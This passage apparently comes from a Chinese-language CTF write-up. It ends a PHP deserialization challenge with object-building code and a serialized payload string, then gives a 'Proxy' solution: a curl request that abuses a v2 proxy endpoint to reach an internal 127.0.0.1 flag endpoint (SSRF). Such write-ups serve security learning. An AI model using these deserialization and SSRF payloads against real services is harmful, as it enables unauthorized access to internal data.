$r1->username=$u;
$u->username=&$r1->value;
echo serialize($r1);
// $s='O:4:"root":2:{s:8:"username";O:4:"user":3:{s:8:"username";i:2024;s:8:"password";s:0:"";s:5:"value";s:3:"222";}s:5:"value";R:3;}';
// $user=unserialize($s);
?>
然后需要根据密码的三个规则微调 payload,最后输出 flag
5.6 Proxy
非预期,直接利用 v2 的 proxy 功能访问 v1 的 flag 即可
1
curl -X POST http://59.110.159.153:39004/v2/api/proxy -H "Content-Type: application/json" -d '{"url": "http://127.0.0.1:8769/v1/api/flag","method": "POST","body": "","headers": {},"follow_redirects": true}'
